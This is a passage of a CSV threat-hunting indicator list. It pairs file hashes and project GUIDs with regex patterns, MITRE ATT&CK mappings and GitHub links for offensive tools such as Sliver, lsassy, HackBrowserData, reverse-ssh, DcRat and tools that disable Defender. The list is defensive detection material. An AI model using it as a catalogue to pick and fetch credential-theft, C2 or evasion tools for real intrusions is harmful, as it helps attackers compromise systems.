"*8b2dc1f28bf0d8eb2501759807524c08778a8c4140e3af9f16bc2829bd9fdc66*",".{0,1000}8b2dc1f28bf0d8eb2501759807524c08778a8c4140e3af9f16bc2829bd9fdc66.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","30657"
"*8b30d6cf12fb57cfd41dd6a41b5f16b04642a019ae57074a4f884a8d5f97699c*",".{0,1000}8b30d6cf12fb57cfd41dd6a41b5f16b04642a019ae57074a4f884a8d5f97699c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30658"
"*8b38b963ce6d0b7eec0647eb5f65005bf981fa462825a75fa193260f0a53a1e8*",".{0,1000}8b38b963ce6d0b7eec0647eb5f65005bf981fa462825a75fa193260f0a53a1e8.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#filehash","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","30659"
"*8b3bf64feef51862a63baf61cae61c353c5b8a16c12f452626e14272a589cc48*",".{0,1000}8b3bf64feef51862a63baf61cae61c353c5b8a16c12f452626e14272a589cc48.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30660"
"*8b3dc5f7f95e60cc22e2e41bf2c000c3ab16983493bae2427b92f984147de598*",".{0,1000}8b3dc5f7f95e60cc22e2e41bf2c000c3ab16983493bae2427b92f984147de598.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30661"
"*8b3f9a3242e75005203ff26e3a5af76bb57ebce8fb29c13559b3bccfa7c4cce3*",".{0,1000}8b3f9a3242e75005203ff26e3a5af76bb57ebce8fb29c13559b3bccfa7c4cce3.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30662"
"*8b41d9f80065f1bdcef489969e314c71f6f36265f6b6b5250a90608b9f393cdb*",".{0,1000}8b41d9f80065f1bdcef489969e314c71f6f36265f6b6b5250a90608b9f393cdb.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","30664"
"*8b43f966bd55fe366e37e1974cdbe61cb01618c4df5298df928de0e2599b6050*",".{0,1000}8b43f966bd55fe366e37e1974cdbe61cb01618c4df5298df928de0e2599b6050.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30665"
"*8b440c386b62c525e2dfb90008c3070f481747a5b6929a4f31878429d6f34c67*",".{0,1000}8b440c386b62c525e2dfb90008c3070f481747a5b6929a4f31878429d6f34c67.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","30666"
"*8b45bafd3a11fdf97de1819bdcfb7560f11ee1207562b1f53712a25326610b4f*",".{0,1000}8b45bafd3a11fdf97de1819bdcfb7560f11ee1207562b1f53712a25326610b4f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30667"
"*8b46156114d2138894c4ab91a8d5e4509ab9c559cef6c349ba45f631d4b4245c*",".{0,1000}8b46156114d2138894c4ab91a8d5e4509ab9c559cef6c349ba45f631d4b4245c.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","30668"
"*8b4cb728e2db083daf0b42a3d3e6982e161ba42f90264e6da1508800e4b4d394*",".{0,1000}8b4cb728e2db083daf0b42a3d3e6982e161ba42f90264e6da1508800e4b4d394.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","0","#filehash","N/A","9","4","381","82","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z","30669"
"*8b4da3fc66c36752ab032c8d57a0df7caa530d07c3e9847582ff2d792768ff12*",".{0,1000}8b4da3fc66c36752ab032c8d57a0df7caa530d07c3e9847582ff2d792768ff12.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30671"
"*8b53f3b214e31f24b635bc45651cf7004da4718cb0b8c844d27836153711da3d*",".{0,1000}8b53f3b214e31f24b635bc45651cf7004da4718cb0b8c844d27836153711da3d.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","30672"
"*8b585057debe15045f4e0694e8fbd3325b7ad71ce2e20003d6637fa6e1c1e025*",".{0,1000}8b585057debe15045f4e0694e8fbd3325b7ad71ce2e20003d6637fa6e1c1e025.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30673"
"*8b5b0e03d4d5becb309f86a7149dd0573f89c19bcd4f8becb7d86b17c90a6c04*",".{0,1000}8b5b0e03d4d5becb309f86a7149dd0573f89c19bcd4f8becb7d86b17c90a6c04.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","30674"
"*8B605B2E-AAD2-46FB-A348-27E3AABA4C9C*",".{0,1000}8B605B2E\-AAD2\-46FB\-A348\-27E3AABA4C9C.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","30675"
"*8b6d83c919ad123d4b27f3404604e99eeba9196cf81f3210a65d8ae1b89465a6*",".{0,1000}8b6d83c919ad123d4b27f3404604e99eeba9196cf81f3210a65d8ae1b89465a6.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","30677"
"*8B723CB2-017A-4CB6-B3E6-C26E9F1F8B3C*",".{0,1000}8B723CB2\-017A\-4CB6\-B3E6\-C26E9F1F8B3C.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","30678"
"*8B73C3EC-D0C4-4E0D-843A-67C81283EC5F*",".{0,1000}8B73C3EC\-D0C4\-4E0D\-843A\-67C81283EC5F.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","30679"
"*8b7c731bf78f3cf4972a8197d3ae0d4b27041e4b52ff7e6451b826e2a77fb06f*",".{0,1000}8b7c731bf78f3cf4972a8197d3ae0d4b27041e4b52ff7e6451b826e2a77fb06f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30680"
"*8b86dff9da37df4824039ae6da4e3ad9b27b2c25805990ede69b2e036dc30996*",".{0,1000}8b86dff9da37df4824039ae6da4e3ad9b27b2c25805990ede69b2e036dc30996.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","#filehash","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","30682"
"*8b88db25c32e31d7b139b916e2df8aa3662b93a072077c26f3319a0978cb05e4*",".{0,1000}8b88db25c32e31d7b139b916e2df8aa3662b93a072077c26f3319a0978cb05e4.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","30684"
"*8b9666a09ac189375f18de24c713e0571a4bf50a9e58489d71f19378b822a623*",".{0,1000}8b9666a09ac189375f18de24c713e0571a4bf50a9e58489d71f19378b822a623.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30686"
"*8b997891257e94a5dca93dd4b7341dc3a991d5fcd4b5730110abfa6c258d30df*",".{0,1000}8b997891257e94a5dca93dd4b7341dc3a991d5fcd4b5730110abfa6c258d30df.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30688"
"*8ba095144dbfff485b4f4db04c338ef687a58306043dad87fe447f219120d1a0*",".{0,1000}8ba095144dbfff485b4f4db04c338ef687a58306043dad87fe447f219120d1a0.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","30689"
"*8ba2d0dc05dc4a81e064e9bf70eb3681f661b026c7daec1433fb8dad4b9d8a1f*",".{0,1000}8ba2d0dc05dc4a81e064e9bf70eb3681f661b026c7daec1433fb8dad4b9d8a1f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30690"
"*8ba79d96e4337be960e4dd1ce94a622c08391da243fee05a44d303de46f9ae93*",".{0,1000}8ba79d96e4337be960e4dd1ce94a622c08391da243fee05a44d303de46f9ae93.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30691"
"*8BAAEFF6-1840-4430-AA05-47F2877E3235*",".{0,1000}8BAAEFF6\-1840\-4430\-AA05\-47F2877E3235.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","#GUIDproject","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","30692"
"*8bacee16a0e720e6a97e27f340ae68ab356828d06eabc6369119e52ca428f6c1*",".{0,1000}8bacee16a0e720e6a97e27f340ae68ab356828d06eabc6369119e52ca428f6c1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30693"
"*8bb4a7173ed3c828b227597d1b59fe08410f19b5e16315cce383d76ac1d67b02*",".{0,1000}8bb4a7173ed3c828b227597d1b59fe08410f19b5e16315cce383d76ac1d67b02.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30694"
"*8bb8d1e02de80c343d03d48eb549cbf6a0a891a699c2c9e47079151817c93ff5*",".{0,1000}8bb8d1e02de80c343d03d48eb549cbf6a0a891a699c2c9e47079151817c93ff5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30695"
"*8bb972b4dc7e0c5b8db0be349ecf62043e69ea1273d5298f8e55c02fa047712c*",".{0,1000}8bb972b4dc7e0c5b8db0be349ecf62043e69ea1273d5298f8e55c02fa047712c.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","30697"
"*8BbApiMBHsPVKkLEP4rVbST6CnSb3LW2gXygngCi5MGiBuwAFh6bFEzT3UTufiCehFK7fNvAjs5Tv6BKYa6w8hwaSjnsg2N.*",".{0,1000}8BbApiMBHsPVKkLEP4rVbST6CnSb3LW2gXygngCi5MGiBuwAFh6bFEzT3UTufiCehFK7fNvAjs5Tv6BKYa6w8hwaSjnsg2N\..{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","30698"
"*8bc182681dd24661db50888cc4a7faf05d3e7d79a7447af14337f14ff58d7453*",".{0,1000}8bc182681dd24661db50888cc4a7faf05d3e7d79a7447af14337f14ff58d7453.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","30700"
"*8bc3958a70372ecaeba0b81e287692297974848cc2ecf053ea7ebb9dfcc933f8*",".{0,1000}8bc3958a70372ecaeba0b81e287692297974848cc2ecf053ea7ebb9dfcc933f8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30701"
"*8bc3ebd6ec1b70d73eaa0b1c17ce124b4bd3fbf9d7c1de6f1f4c11e9da92eabc*",".{0,1000}8bc3ebd6ec1b70d73eaa0b1c17ce124b4bd3fbf9d7c1de6f1f4c11e9da92eabc.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","30702"
"*8bc52fc1dbd2e9319241d826b23a227132199b37951c8222c901b6ab069c4084*",".{0,1000}8bc52fc1dbd2e9319241d826b23a227132199b37951c8222c901b6ab069c4084.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","30703"
"*8bc622b1b2357145399d8b5ed0fd82bb253e4904dd6946eecc53a59fb578a1ea*",".{0,1000}8bc622b1b2357145399d8b5ed0fd82bb253e4904dd6946eecc53a59fb578a1ea.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","30704"
"*8bcd2cc3874df031fb416bb9f451e2b13f146a71b0e02a7edca42c21b1d248b0*",".{0,1000}8bcd2cc3874df031fb416bb9f451e2b13f146a71b0e02a7edca42c21b1d248b0.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","30706"
"*8bce6c99c0ac4b8d76c49f6e4dece996b77bb7d71d9acdbfcf5b0460811adfb9*",".{0,1000}8bce6c99c0ac4b8d76c49f6e4dece996b77bb7d71d9acdbfcf5b0460811adfb9.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","#filehash","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","30707"
"*8bcf672bb3ab901527e707e501bb399874fc6558320ecbe00d311d308c5bad89*",".{0,1000}8bcf672bb3ab901527e707e501bb399874fc6558320ecbe00d311d308c5bad89.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30708"
"*8bdd98ae5c8a162a4292fe799be541c124775a34b31516789044c792ca6b4220*","","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","30710"
"*8be1679cd0a2661629259d0011fe9a3bc3e7270801d97fc154577b10b85494fb*",".{0,1000}8be1679cd0a2661629259d0011fe9a3bc3e7270801d97fc154577b10b85494fb.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#filehash","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","30711"
"*8be40d1c7a362d910cc8c25da987afabb4bb95fd5542c2ab043f2350b7191cab*",".{0,1000}8be40d1c7a362d910cc8c25da987afabb4bb95fd5542c2ab043f2350b7191cab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30712"
"*8BF244EB-0CA3-403E-A076-F1D77731A728*",".{0,1000}8BF244EB\-0CA3\-403E\-A076\-F1D77731A728.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","30715"
"*8bf810cf013331cf9ee984714251d0e7963b431588ab419e0b83824d8754ab67*",".{0,1000}8bf810cf013331cf9ee984714251d0e7963b431588ab419e0b83824d8754ab67.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30716"
"*8BF82BBE-909C-4777-A2FC-EA7C070FF43E*",".{0,1000}8BF82BBE\-909C\-4777\-A2FC\-EA7C070FF43E.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#GUIDproject","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","30717"
"*8BF82BBE-909C-4777-A2FC-EA7C070FF43E*",".{0,1000}8BF82BBE\-909C\-4777\-A2FC\-EA7C070FF43E.{0,1000}","offensive_tool_keyword","SharpMove",".NET Project for performing Authenticated Remote Execution","T1021 - T1106 - T1218","TA0002 - TA0008","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpMove","1","0","#GUIDproject","N/A","8","4","393","66","2023-02-08T23:48:54Z","2020-01-24T22:21:04Z","30718"
"*8bf86bce665800caee44d5491c9bc54e9eb86d2efe6c665343f1cb679e2a6690*",".{0,1000}8bf86bce665800caee44d5491c9bc54e9eb86d2efe6c665343f1cb679e2a6690.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","30719"
